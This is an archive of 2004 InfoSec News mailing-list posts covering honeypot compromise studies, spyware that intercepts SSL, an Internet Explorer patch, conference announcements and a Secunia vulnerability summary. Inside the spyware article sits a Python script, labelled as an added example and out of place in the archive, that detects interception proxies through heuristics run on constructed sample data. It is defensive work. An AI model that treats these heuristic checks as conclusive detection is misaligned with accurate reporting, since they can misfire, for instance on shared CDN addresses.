From isn at c4i.org Wed Dec 1 06:09:48 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 1 06:30:09 2004
Subject: [ISN] Unprotected PCs Fall To Hacker Bots In Just Four Minutes
Message-ID:

http://www.techweb.com/wire/security/54201306

By Gregg Keizer
TechWeb.com
November 30, 2004

The lifespan of a poorly protected PC connected to the Internet is a mere four minutes, research released Tuesday claimed. After that, it's owned by a hacker.

In the two-week test, marketing-communications firm AvanteGarde deployed half a dozen systems in "honeypot" style, using default security settings. It then analyzed the machines' performance by tallying the attacks, counting the number of compromises, and timing how long it took an attack to successfully hijack a computer once it was connected to the Internet.

The six machines were equipped with Microsoft Windows Small Business Server 2003, Microsoft Windows XP Service Pack 1 (SP1), Microsoft Windows XP SP1 with the free ZoneAlarm personal firewall, Microsoft Windows XP SP2, Macintosh OS X 10.3.5, and Linspire's distribution of Linux.

Not surprisingly, Windows XP SP1 sans third-party firewall had the poorest showing.

"In some instances, someone had taken complete control of the machine in as little as 30 seconds," said Marcus Colombano, a partner with AvanteGarde, and, along with former hacker Kevin Mitnick, a co-investigator in the experiment. "The average was just four minutes. Think about that. Plug in a new PC--and many are still sold with Windows XP SP1--to a DSL line, go get a cup of coffee, and come back to find your machine has been taken over."

Windows XP SP1 with the for-free ZoneAlarm firewall, however, as well as Windows XP SP2, fared much better. Although both configurations were probed by attackers, neither was compromised during the two weeks.

"If you're running a firewall so your machine is not seen, you're less likely to be attacked," said Colombano. "The bot or worm simply goes onto the next machine."
Although Windows XP SP1 includes a firewall, it's not turned on by default. That security hole was one of those plugged--and heavily touted--by Microsoft in SP2.

The successful attacks took advantage of weak passwords on the target machines, as well as a pair of long-patched vulnerabilities in Microsoft Windows. One, the DCOM vulnerability, harks back to July, 2003, and was behind the vicious MSBlast worm of that summer. The second, dubbed the LSASS vulnerability, was first disclosed in April, 2004, and led to the Sasser worm.

The most secure system during the experiment was the one running Linspire's Linux. Out of the box, Linspire left only one open port. While it reacted to ping requests by automated attackers sniffing for victims, it experienced the fewest attacks of any of the six machines and was never compromised, since there were no exposed ports (and thus services) to exploit.

The Macintosh machine, on the other hand, was assaulted as often as the Windows XP SP1 box, but never was grabbed by a hacker, thanks to the tunnel vision that attackers have for Windows.

"The automated bot/worm attackers were exclusively using Windows-based attacks," said Colombano, so Mac and Linux machines are safe. For now. "[But] it would have been very vulnerable had code been written to compromise its system," he added.

For the bulk of users who work with Windows, however, Colombano didn't recommend dumping Redmond's OS and scurrying for the protection of hacker-ignored platforms.

"Update Windows regularly with Microsoft's patches, use a personal firewall--third-party firewalls still have their place, since Microsoft's isn't suited to guard against outbound attacks--keep secure passwords, and use some type of anti-virus and anti-spyware software," he advised.

Of the list, the firewall is the most important. The study concluded, for example, that Linux- and Windows-based machines using an application firewall were the best at preventing attacks.
"No machine is immune," he counseled. "No human is safe from every virus, and it's the same for machines. That's why people have to have some personal responsibility about security. You have to be a good citizen on the network, so you're not only protecting yourself, but others who might be attacked from exploits originating on your machine."

From isn at c4i.org Wed Dec 1 06:09:33 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 1 06:30:11 2004
Subject: [ISN] Black Hat CFPs now open: Europe and Asia
Message-ID:

Forwarded from: Jeff Moss

Hello ISN,

I've been a bit quiet lately, but with Thanksgiving over I wanted to announce our latest round of CFPs.

BLACK HAT BRIEFINGS CALL FOR PAPERS
EUROPE AND ASIA

The Black Hat Briefings was created to fill the need for computer security professionals to better understand the security risks to information infrastructures and computer systems.

What makes Black Hat Briefings different? The speakers. We select the speakers that are doing unique research, writing the security tools, or finding the bugs. No vendor pitches. Just straight talk from people who are experts in their chosen field of study.

This year our Europe and Asia shows will be held back-to-back; potential presenters are invited to submit CFPs to both shows.

If you have original research, new tools, or a fresh perspective on an old problem, we encourage you to submit a presentation. By presenting at the Black Hat Briefings you have the opportunity to both influence your peers and to contribute to the advancement of the state of the art. We are striving to create a high-end technical conference and any talk that helps reach this goal will be given extra attention.

Topics of discussion will include zero day attacks and defenses, deep knowledge, policy, management, and the law.
If you have a speech idea you believe is of Black Hat caliber, do not hesitate to submit it, even if it does not appear to match an existing track. If you have never been to a Black Hat event, please check out our past presentations on-line to get a feel for what we are looking for:
http://www.blackhat.com/html/bh-multimedia-archives-index.html

Please do not wait to submit. Presentations are selected and evaluated in the order received.

Full and detailed explanations are available at:
http://www.blackhat.com/html/bh-europe-05/bh-eu-asia-05-cfp.html

Important Dates

January 15th 2005: Call for Papers closes for Black Hat Europe and Asia 2005. Please submit now
TBD: Early Bird Discount Rate for registration closes
February 15th 2005: Black Hat USA Call for Papers opens
February 16th 2005: Conference & Group discount rates at the Grand Hotel Krasnapolsky, Amsterdam closes
March 29-20th 2005: Black Hat Europe 2005 Training
March 31st to April 1st 2005: Black Hat Europe 2005 Briefings
April 5-6th 2005: Black Hat Asia 2005 Training
April 7-8th 2005: Black Hat Asia 2005 Briefings
July 24-27th 2005: Black Hat Trainings, Caesars Palace, Las Vegas Nevada, USA
July 28-29th 2005: Black Hat Briefings, Caesars Palace, Las Vegas Nevada, USA

From isn at c4i.org Wed Dec 1 06:09:10 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 1 06:30:13 2004
Subject: [ISN] Lycos anti-spam site hit by hackers
Message-ID:

http://news.zdnet.co.uk/internet/security/0,39020375,39175578,00.htm

Munir Kotadia
ZDNet Australia
December 01, 2004
Spammers are suspected of hacking into and downing Lycos's anti-spam Web site just hours after it went live. The Web site is currently inaccessible and could also be the victim of a DDoS attack.

Lycos on Tuesday kicked off its "make love not spam" campaign by offering users a screensaver that helps to launch distributed denial-of-service (DDoS) attacks on spammers' Web sites. The company said the screensaver uses the idle processing power of a computer to slow down the response times from spammers' Web sites - much in the same way spammers use compromised PCs to distribute unsolicited email messages.

However, within hours of the makelovenotspam.com site being launched, the original front page was replaced with a simple message: "Yes, attacking spammers is wrong. You know this, you shouldn't be doing it. Your IP address and request have been logged and will be reported to your ISP for further action."

Finnish antivirus firm F-Secure, which advised users not to participate in Lycos' campaign because of "possible legal problems", suspects the site has been hacked by a pro-spam group because "they definitely would have a motive to attack the site".

F-Secure reported that the Web site had returned to normal by around 6 a.m. (Sydney time) but at the time of writing makelovenotspam.com was unavailable and could be under a retaliatory DDoS attack.

Earlier this year, Symbiot, a Texas-based security firm, launched a corporate defence system that was designed to fight back against DDoS and hacker attacks by launching a counter-strike. At the time, Symbiot's president Mike Erwin said that "totally passive" defences were "not an adequate deterrent" and argued that for complete defence an "offensive tactic must be employed".

Security experts were alarmed at the company's attitude and warned that such tactics could be counterproductive.
Jay Heiser, chief analyst at IT risk management company TruSecure, said Symbiot's proposal was a very bad criterion for choosing risk-reduction measures.

"There is no evidence that this is the most effective way to deal with the problems and there is quite a bit of historical precedence that indicates it is totally counterproductive," said Heiser.

Lycos was unavailable for comment.

ZDNet Australia's Munir Kotadia reported from Sydney.

From isn at c4i.org Wed Dec 1 06:10:04 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 1 06:30:14 2004
Subject: [ISN] Stressing security training
Message-ID:

Forwarded from: William Knowles

http://www.fcw.com/geb/articles/2004/1129/web-secure-11-30-04.asp

By Florence Olsen
Nov. 30, 2004

Teaching basic computer security has become an essential part of training government employees, and agency officials who neglect security education will regret it, said David Jordan, chief information security officer for Arlington County, Va.

Employees who are aware of the pitfalls of using computers connected to the Internet are "the most powerful weapons against cyberthreats that you can have," he told Federal Computer Week during a Nov. 29 interview.

That's why Jordan said he spends 15 to 20 minutes with all new county government employees talking to them about cybersecurity. And it's why he sends computer and network security information to employees on a biweekly basis via the county's electronic newsletter.

For the latter, he solicits the help of editors in the county's communications office. Information security officers, he said, should cultivate good relationships with communications experts who can help them teach employees how to avoid being victims of computer worms and viruses. Editors can take a security officer's message and craft it to suit the audience, Jordan said.
Company officials who sell computer security products also recognize the role user awareness plays in protecting computers and networks from malicious software code. Security policies and firewalls alone won't provide adequate protection, said Kathy Coe, regional director of educational services at Symantec, which makes antivirus and other security software.

Last year, for example, officials at a federal financial institution tested employees' adherence to the agency's computer security policy against opening e-mail attachments from unknown sources. About half of the employees failed the test, Coe said. Against agency policy, they opened an e-mail attachment that purported to show a traffic snarl in Washington, D.C., after a North Carolina tobacco farmer drove his tractor into a shallow pond on the National Mall.

Without consistent and continuous user awareness training, Coe said, all of us are easy prey.

*==============================================================*
"Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC
----------------------------------------------------------------
C4I.org - Computer Security, & Intelligence - http://www.c4i.org
*==============================================================*

From isn at c4i.org Wed Dec 1 06:10:19 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 1 06:30:16 2004
Subject: [ISN] Universities struggling with SSL-busting spyware
Message-ID:

http://www.nwfusion.com/news/2004/1130univestrug.html

By Paul Roberts
IDG News Service
11/30/04

U.S. universities are struggling with a flare-up of dangerous spyware that can snoop on information encrypted using SSL. Experts are warning that the stealthy software, called Marketscore, could be used to intercept a wide range of sensitive information, including passwords and health and financial data.
In recent weeks, information technology departments at a number of universities issued warnings about problems caused by the Marketscore software, which promises to speed up Web browsing. The program, which routes all user traffic through its own network of servers, poses a real threat to user privacy, security experts agree.

Columbia University, Cornell University, Indiana University, The State University of New York (SUNY) at Albany, and The Pennsylvania State University are among those noting an increase in the number of systems running Marketscore software in recent weeks. Each institution warned its users about Marketscore and posted instructions for removing the software.

The software is bundled with iMesh peer-to-peer software, and may have made it onto university networks that way, said David Escalante, director of computer security at Boston College.

The company that makes the software, Marketscore, has headquarters in Reston, Va., at the same mailing address as online behavior tracking company comScore Networks. ComScore Networks did not respond to repeated requests for comment.

Reports of infected systems on campuses ranged from a handful up to about 200 on one large campus network, Escalante said.

Marketscore is just the latest incarnation of a spyware program called Netsetter, which first appeared in January, said Sam Curry, vice president of eTrust Security Management at Computer Associates.

"Basically it takes all your Web traffic and forces it through its own proxy servers," he said.

Ostensibly, the redirection speeds up Web surfing, because pages cached on Marketscore's servers load faster than they would if they were served directly from the actual Web servers for sites such as Google.com or Yahoo.com. However, those performance benefits have been elusive.

"People who have installed the software complain to us that they're not getting any improvement," Curry said.
Richard Smith, an independent software consultant in Boston, is also skeptical of performance improvement claims made by Marketscore and others, especially since many Internet service providers already offer Web caching for their dial-up customers, he said in an e-mail message.

At Cornell, the university IT Security Office blocked connections between Cornell's network and the Marketscore servers, according to a message posted on the university's Web site. Administrators at SUNY Albany took similar steps, according to a message posted on that university's Web site.

While other legitimate software programs make claims similar to Marketscore's about improving Web browsing speed, Internet security experts are troubled that the software creates its own trusted certificate authority on computers. That certificate authority intercepts Web communications secured using SSL, decrypting that traffic, then sending it to the Marketscore servers before encrypting the traffic and passing it along to its final destination. That traffic could include sensitive information, including passwords, credit card and Social Security numbers, Curry said.

Marketscore should be a big concern for companies -- especially those like banks with employees who handle sensitive data, Escalante said.

"I don't know how good it is for parties on either end of a transaction to have a third party listening in," he said.

If nothing else, all the extra decrypting and encrypting slows down SSL traffic, casting doubt on Marketscore's claims to be an Internet accelerator, Smith said.

CA's eTrust anti-virus software labeled Marketscore "spyware" up until June of this year, but stopped doing so after Marketscore appealed that designation using an established vendor appeal process, Curry said. CA is currently re-evaluating the "spyware" designation using a complicated, multifactor scoring system.
The software is less repugnant than its predecessor, Netsetter, which did not clearly disclose to users what it did when installed and made itself difficult to remove. Marketscore is better on both those counts, clearly stating both in the end user license agreement and during the installation process what the product does, and providing users with an easy uninstall program.

CA considers Marketscore an example of a new breed of software that lies in the gray area between spyware and legitimate software, Curry said.

"Under the old definition, (Marketscore) clearly qualified as spyware. But there are new categories emerging," he said.

While Marketscore clearly tracks user behavior, it doesn't hijack Web browser home pages, spew pop-up advertisements or conceal its presence, like earlier generations of spyware did, Curry said.

"There's more granularity. Companies have responded and ... are adding benefits and value to these programs. We're looking at ways to more accurately identify this," he said.

Perhaps trying to increase its appeal, Marketscore is now advertising itself as an e-mail protection service, in addition to an Internet accelerator. According to the Marketscore.com Web site, members will receive Symantec's CarrierScan Server anti-virus technology at no cost.

However, that promise doesn't sit well with Symantec, which said it has no relationship with Marketscore and, in fact, considers the software "spyware," said Genevieve Haldeman, a company spokeswoman.

"We don't have relationships with companies that make software we consider malicious," she said.

Symantec is considering legal action to force Marketscore to stop using its name and logo on the Marketscore.com Web site, she said.

Spyware or not, the lesson of Marketscore is that "if it sounds too good to be true, it probably is," Curry said.
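The interception pattern the article describes (a locally added root CA whose certificates turn up on SSL sessions to unrelated sites, all terminating at the vendor's proxy) leaves two signals a defender can check for: a root that was not in the trust-store baseline, and one issuer or one peer address shared by sessions to many different hosts. The following is an added example, not code from the article or from any vendor; the root names, fingerprints and session records are constructed sample data, and "Acme Accelerator Root" is a hypothetical name.

```python
"""Endpoint/network checks for SSL-intercepting proxy software.

All data below is constructed sample input, not taken from the article.
"""
from collections import defaultdict
from dataclasses import dataclass

# Trust-store snapshot taken before the software appeared (constructed fingerprints).
BASELINE_ROOTS = {
    "sha256:AAAA1111": "Example Public Root CA",
    "sha256:BBBB2222": "Another Public Root CA",
}

# Trust store as it looks now. The third entry models the root an
# interception product installs so its forged leaves validate (hypothetical name).
CURRENT_ROOTS = {
    "sha256:AAAA1111": "Example Public Root CA",
    "sha256:BBBB2222": "Another Public Root CA",
    "sha256:CCCC3333": "Acme Accelerator Root (hypothetical)",
}


@dataclass(frozen=True)
class TlsSession:
    host: str      # server name the browser asked for
    peer_ip: str   # address the TLS connection actually terminated at
    issuer: str    # subject of the CA that signed the leaf certificate presented


# Constructed observations. Genuine sites present leaves from public CAs and
# resolve to their own addresses; a local interception proxy breaks both.
SESSIONS = [
    TlsSession("bank.example.com", "203.0.113.10", "Acme Accelerator Root (hypothetical)"),
    TlsSession("mail.example.net", "203.0.113.10", "Acme Accelerator Root (hypothetical)"),
    TlsSession("shop.example.org", "203.0.113.10", "Acme Accelerator Root (hypothetical)"),
    TlsSession("intranet.example.com", "10.0.0.5", "Example Public Root CA"),
]


def unexpected_roots(current, baseline):
    """Roots present now that were absent from the baseline snapshot."""
    return {fp: subj for fp, subj in current.items() if fp not in baseline}


def interception_findings(sessions, trusted_public_roots, min_hosts=2):
    """Flag (a) an issuer that is not a public CA yet signs leaves for several
    unrelated hosts, and (b) a single peer address at which several hosts'
    sessions terminate. Signal (b) alone can also fire on shared CDN
    front ends, so it is corroborating evidence rather than proof."""
    hosts_by_issuer = defaultdict(set)
    hosts_by_ip = defaultdict(set)
    for s in sessions:
        hosts_by_issuer[s.issuer].add(s.host)
        hosts_by_ip[s.peer_ip].add(s.host)
    findings = []
    for issuer, hosts in hosts_by_issuer.items():
        if issuer not in trusted_public_roots and len(hosts) >= min_hosts:
            findings.append(("non-public issuer signs many hosts", issuer, sorted(hosts)))
    for ip, hosts in hosts_by_ip.items():
        if len(hosts) >= min_hosts:
            findings.append(("many hosts terminate at one address", ip, sorted(hosts)))
    return findings


def corroborated_interception(current, baseline, sessions):
    """Strongest signal: a newly added root is also the issuer seen on
    sessions to multiple hosts. Returns the matching findings."""
    added_subjects = set(unexpected_roots(current, baseline).values())
    public_subjects = set(baseline.values())
    return [f for f in interception_findings(sessions, public_subjects)
            if f[0] == "non-public issuer signs many hosts" and f[1] in added_subjects]


if __name__ == "__main__":
    for fp, subj in unexpected_roots(CURRENT_ROOTS, BASELINE_ROOTS).items():
        print("new root:", fp, subj)
    for kind, key, hosts in interception_findings(SESSIONS, set(BASELINE_ROOTS.values())):
        print(kind, "->", key, hosts)
    print("corroborated:", corroborated_interception(CURRENT_ROOTS, BASELINE_ROOTS, SESSIONS))
```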
From isn at c4i.org Wed Dec 1 06:10:34 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 1 06:30:18 2004
Subject: [ISN] FBI's Cyber-Crime Chief Relates Struggle for Top Talent
Message-ID:

http://www.eweek.com/article2/0,1759,1733838,00.asp

By Ryan Naraine
November 30, 2004

The FBI's inability to recruit and keep the best available IT talent has proven to be one of the biggest challenges facing the government's Internet Crime Complaint Center (I3C), a senior official said Tuesday.

Delivering the keynote address on the opening day of Ziff Davis Media's Security Virtual Tradeshow, I3C chief Daniel Larkin said the center's staffing problems underline the need for deeper cooperation between the FBI and the IT industry to win the battle against sophisticated cyber-criminals.

"We can't recruit and keep the best available minds in the IT world. They come, stay a few years and move on because, ultimately, we can't pay what the industry pays for talent," Larkin said, adding that the bureau also has experienced difficulties with keeping pace with employees' training needs.

Because of those shortcomings, Larkin said, the I3C spent the past four years forging partnerships with the biggest names in the tech industry to share expertise, coordinate on intelligence and develop best practices and protocols for fighting cyber-crime.

He said the unit has come a long way since its creation in 2000 as the Internet Fraud Complaint Center (IFCC). Originally formed as a partnership between the FBI and the National White Collar Crime Center (NW3C) to fight online fraud, Larkin said the unit had to evolve to keep up with the rapidly changing face of crime on the Internet.

The I3C now tackles a range of criminal schemes on the Internet, including spam, phishing, spoofed or hijacked bank accounts, international reshipping schemes with origins in West Africa, cyber-extortion, computer intrusions and economic espionage.
Larkin discussed several major highlights over the years, including "Operation Web Snare" in August, which led to the arrests or convictions of more than 150 individuals and the return of 117 criminal complaints and indictments.

Operation Web Snare was a collaborative effort that included work by 36 U.S. Attorney's offices nationwide, the criminal division of the Department of Justice, 37 of the FBI's 56 field divisions, 13 of the Postal Inspection Service's 18 field divisions, and the Federal Trade Commission, together with a variety of other federal, state, local and foreign law enforcement agencies.

Larkin outlined the need to develop new training capabilities to keep up with online scammers who use multiple techniques to hoodwink Internet users into giving up sensitive personal data.

"We can use individuals from academia and the tech industry to cross-pollinate resources and feed that to our cyber forensics labs to help build strong cases," he said.

"The cycling of new resources into a project brings fresh minds and fresh tactics. That's much more desirable than someone who had been engaged for a few years," he added.

"Originally, we were trying to create the mother of all databases to deal with online fraud. But with our staffing problems, we decided it was better to let the industry leaders do that," Larkin said, adding that the I3C now uses a simple, uniform format for data collection that allows a high level of collaboration.

"We act as a bridge between the industry groups and the task forces working the cases. We'll partner with all sides to ensure that information is flowing smoothly," he said.

-=-

Editor's Note: The Ziff Davis Media Security Virtual Tradeshow is run by eSeminars, a division of Ziff Davis Media, parent company of eWEEK.com.
From isn at c4i.org Thu Dec 2 01:48:44 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 2 02:02:22 2004
Subject: [ISN] DallasCon Professional Cyber Defense Conference
Message-ID:

Forwarded from: DallasCon

DallasCon Professional Cyber Defense Conference
May 2-7, 2005
Dallas, Texas

The wait is over! The fastest growing and the most respected security event in the Southwest is back for its 4th consecutive year. This year, DallasCon is focusing on a practical approach to Network and Wireless Security geared directly to the industry professionals. The event will feature 6-days of intense hands-on training and information on Network and Wireless Security.

If you are a Technical Professional who is interested in learning the latest hacks, tricks, and threats in Information Security to protect your company's networks and assets, then you cannot miss DallasCon 2005!

Don't Delay! To take advantage of the incredible pre-registration prices, you must register before February 15, 2005.

For more information, to submit a paper, or to register visit: http://www.DallasCon.com.

From isn at c4i.org Thu Dec 2 01:49:02 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 2 02:02:24 2004
Subject: [ISN] Tenet warns of terrorists combining physical, telecommunications attacks
Message-ID:

Forwarded from: William Knowles

http://www.govexec.com/dailyfed/1204/120104c1.htm

By Chris Strohm
cstrohm@govexec.com
December 1, 2004

Former CIA Director George Tenet on Wednesday said greater government regulation of the Internet and telecommunications networks is needed in order to guard against terrorist attacks.

The U.S. intelligence community needs to consider how terrorists might attempt to couple an attack on telecommunication networks with a physical attack, Tenet said during a keynote speech at the E-Gov Institute's homeland security conference in Washington.
"Efforts at physical security will not be enough, because the thinking enemy that we confront is going to school on our network vulnerabilities as well, and I think the two are inextricably linked," he said. "The number of known potential adversaries conducting research on information attacks is increasing rapidly and includes intelligence services, military organizations and nonstate entities."

According to Tenet "a loose collection of regional [terrorist] networks" now "thrive independently" worldwide by using telecommunications and the Internet to communicate with and learn from each other at almost no cost.

Telecommunications technology for government and business should have built-in protections, Tenet said, such as intrusion detection and protection systems, antivirus software, authentication and identity management services, and encryption.

"I know that these actions would be controversial in this age where we still think the Internet is a free and open society with no control or accountability," he added. "But, ultimately, the Wild West must give way to governance and control."

Many national media outlets were not allowed to attend Tenet's speech. The Associated Press reported that Tenet insisted that national media be kept out, only allowing in reporters for trade publications that cover the government.

Tenet was also critical of the direction that intelligence reform is taking in Washington.

"There's a big focus on structural change at the top. My perspective is, this is all about data," he said.

The U.S. government has "an enormous amount of knowledge" on terrorist activities that should be disseminated to state and local officials, Tenet continued. "We have to start treating them as equals with regard to data and teach them as much as we possibly can by pushing data to them at the lowest levels of classification.
[We should] even begin a very serious process of learning how to write at the unclassified level so we can educate everybody about what we see going on in the world."

"I really believe data sharing and the movement of data is the most critical feature of reform. I think that's where this game gets won and lost," he said. "We're having discussions about power relationships between people in Washington. At the end of day, I don't think that's the right conversation."

Legislation to overhaul the U.S. intelligence community is currently stalled in Congress. A key component of that legislation is creating an intelligence director to oversee the nation's 15 intelligence agencies.

Tenet reiterated criticism he expressed to the 9/11 commission earlier this year that the person leading U.S. intelligence agencies should be affiliated with an agency.

"If you're not getting your hands dirty every day in terms of risk, I don't think you can lead the men and women of American intelligence, or capably inform the president," he said.

From isn at c4i.org Thu Dec 2 01:49:14 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 2 02:02:26 2004
Subject: [ISN] Microsoft releases patch to plug IE vulnerability
Message-ID:

http://www.computerworld.com/securitytopics/security/story/0,10801,97957,00.html

By Jaikumar Vijayan
DECEMBER 01, 2004
COMPUTERWORLD

As expected, Microsoft Corp. today released an out-of-cycle security bulletin and patch designed to fix a critical hole in the Internet Explorer Web browser that is already being widely exploited by attackers.
The company also announced a change to Windows Update for three previously issued fixes from October for some users of Windows XP Service Pack 1.

The vulnerability addressed by Microsoft's latest bulletin, MS04-040, was first disclosed on Oct. 24 and exists in the iFrame tags of Internet Explorer. The buffer overflow flaw allows attackers to take complete control of a compromised system and can be exploited by getting users to visit Web sites where malicious code can be downloaded.

A proof-of-concept exploit named Bofra that takes advantage of the iFrame flaw has been available for several days and was used in launching attacks via banner ads last week that redirected users to rogue Web sites.

"We are aware of some proof-of-concept code and public attacks" that take advantage of the flaw, said Stephen Toulouse, security program manager at Microsoft's security response center. That's why Microsoft is urging users to apply the latest patch as soon as possible, he added. The flaw doesn't affect users who have already installed XP SP2, he said.

Meanwhile, Microsoft today reissued three of its fixes from October for users of SP1 who may not have been offered the updates earlier. The problem involves SP1 users who may have downloaded the SP2 patch but have not installed it on their computers yet. Microsoft's Windows Update and Automatic Updates service wouldn't have offered the October fixes automatically to such users, Toulouse said. Today's update fixes the problem for those users.
From isn at c4i.org Fri Dec 3 04:40:00 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 3 04:53:06 2004
Subject: [ISN] Secunia Weekly Summary - Issue: 2004-49
Message-ID:

========================================================================

The Secunia Weekly Advisory Summary
2004-11-25 - 2004-12-02

This week : 40 advisories

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3..............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

Monitor, Filter, and Manage Security Information
- Filtering and Management of Secunia advisories
- Overview, documentation, and detailed reports
- Alerting via email and SMS

Request Trial:
https://ca.secunia.com/?f=s

========================================================================
2) This Week in Brief:

ADVISORIES:

Microsoft has issued a patch for Internet Explorer, which addresses a buffer overflow vulnerability (also known as the IFRAME vulnerability) in several HTML elements. The patch has been long awaited, and all users not running systems with Windows XP Service Pack 2 installed are urged to install this update as soon as possible.

See Secunia advisory below for patch links.

References:
http://secunia.com/SA12959

VIRUS ALERTS:

Secunia has not issued any virus alerts during the last week.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1. [SA13269] Winamp "IN_CDDA.dll" Buffer Overflow Vulnerability
2. [SA12959] Internet Explorer HTML Elements Buffer Overflow Vulnerability
3. [SA13317] Microsoft Internet Explorer "Save Picture As" Image Download Spoofing
4. [SA13271] Sun Java Plug-in Sandbox Security Bypass Vulnerability
5. [SA12889] Microsoft Internet Explorer Two Vulnerabilities
6. [SA13328] Microsoft Windows WINS Replication Packet Handling Vulnerability
7. [SA13203] Microsoft Internet Explorer Two Vulnerabilities
8. [SA12758] Microsoft Word Document Parsing Buffer Overflow Vulnerability
9. [SA13334] WS_FTP Server FTP Commands Buffer Overflow Vulnerabilities
10. [SA13308] Linux Kernel Local DoS and Memory Content Disclosure Vulnerabilities

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA13334] WS_FTP Server FTP Commands Buffer Overflow Vulnerabilities
[SA13318] MailEnable IMAP Service Buffer Overflow Vulnerabilities
[SA13317] Microsoft Internet Explorer "Save Picture As" Image Download Spoofing
[SA13328] Microsoft Windows WINS Replication Packet Handling Vulnerability
[SA13333] JanaServer Two Denial of Service Vulnerabilities

UNIX/Linux:
[SA13349] Fedora update for cyrus-imapd
[SA13346] Conectiva update for cyrus-imapd
[SA13345] SUSE Updates For Multiple Packages
[SA13341] Sun Solaris Netscape PNG Image Handling Vulnerabilities
[SA13335] Fedora update for gaim
[SA13332] Gentoo update for sun-jdk/sun-jre-bin/blackdown-jdk/blackdown-jre
[SA13320] Debian update for tetex-bin
[SA13315] Mandrake update for cyrus-imapd
[SA13310] Debian update for cyrus-imapd
[SA13309] Gentoo update for cyrus-imapd
[SA13307] jabberd Client to Server Component Buffer Overflow Vulnerability
[SA13344] Conectiva update for abiword
[SA13338] Debian update for libgd
[SA13337] Debian update for libgd2
[SA13323] Fedora update for squirrelmail
[SA13339] SUSE update for kernel
[SA13336] Fedora update for samba
[SA13313] Debian update for yardradius
[SA13312] YardRadius "process_menu()" Buffer Overflow Vulnerability
[SA13354] Fedora update for iptables
[SA13326] Gentoo update for opendchub
[SA13325] Open DC Hub "RedirectAll" Buffer Overflow Vulnerability [SA13324] Gentoo update for phpwebsite [SA13322] Gentoo update for phpmyadmin [SA13343] Debian update for openssl [SA13340] Sun Solaris ping Utility Privilege Escalation Vulnerability [SA13316] Mandrake update for a2ps [SA13314] Mandrake update for zip [SA13308] Linux Kernel Local DoS and Memory Content Disclosure Vulnerabilities Other: Cross Platform: [SA13327] Orbz Password Field Buffer Overflow Vulnerability [SA13331] FreeImage Library Interleaved Bitmap Image Buffer Overflow Vulnerability [SA13329] Nuked-Klan "Links" Module Script Insertion Vulnerability [SA13319] YaBB Unspecified "shadow" Tags Script Insertion Vulnerability [SA13321] Groupmax World Wide Web Cross-Site Scripting and Directory Traversal [SA13330] IberAgents Clear Text User Credential Disclosure ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA13334] WS_FTP Server FTP Commands Buffer Overflow Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-30 Reed Arvin has discovered some vulnerabilities in WS_FTP Server, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13334/ -- [SA13318] MailEnable IMAP Service Buffer Overflow Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-26 Hat-Squad has reported two vulnerabilities in MailEnable Professional and MailEnable Enterprise Edition, which can be exploited by malicious people to compromise a vulnerable system. 
Full Advisory: http://secunia.com/advisories/13318/

--
[SA13317] Microsoft Internet Explorer "Save Picture As" Image Download Spoofing
Critical: Moderately critical
Where: From remote
Impact: Spoofing
Released: 2004-11-26

cyber flash has discovered a vulnerability in Microsoft Internet Explorer, which can be exploited by malicious people to trick users into downloading malicious files.

Full Advisory: http://secunia.com/advisories/13317/

--
[SA13328] Microsoft Windows WINS Replication Packet Handling Vulnerability
Critical: Moderately critical
Where: From local network
Impact: System access
Released: 2004-11-29

Nicolas Waisman has reported a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13328/

--
[SA13333] JanaServer Two Denial of Service Vulnerabilities
Critical: Less critical
Where: From local network
Impact: DoS
Released: 2004-12-01

Luigi Auriemma has reported two vulnerabilities in JanaServer, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/13333/

UNIX/Linux:
--
[SA13349] Fedora update for cyrus-imapd
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-02

Fedora has issued an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13349/

--
[SA13346] Conectiva update for cyrus-imapd
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-02

Conectiva has issued an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13346/

--
[SA13345] SUSE Updates For Multiple Packages
Critical: Highly critical
Where: From remote
Impact: Security Bypass, DoS, System access
Released: 2004-12-01

SUSE has issued updates for multiple packages. These fix various vulnerabilities, which can be exploited to bypass certain security functionality, cause a DoS (Denial-of-Service), and potentially compromise a user's system.

Full Advisory: http://secunia.com/advisories/13345/

--
[SA13341] Sun Solaris Netscape PNG Image Handling Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2004-12-01

Sun has acknowledged some vulnerabilities in the Netscape browser for Solaris, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a user's system.

Full Advisory: http://secunia.com/advisories/13341/

--
[SA13335] Fedora update for gaim
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-11-30

Fedora has issued an update for gaim. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/13335/

--
[SA13332] Gentoo update for sun-jdk/sun-jre-bin/blackdown-jdk/blackdown-jre
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-11-30

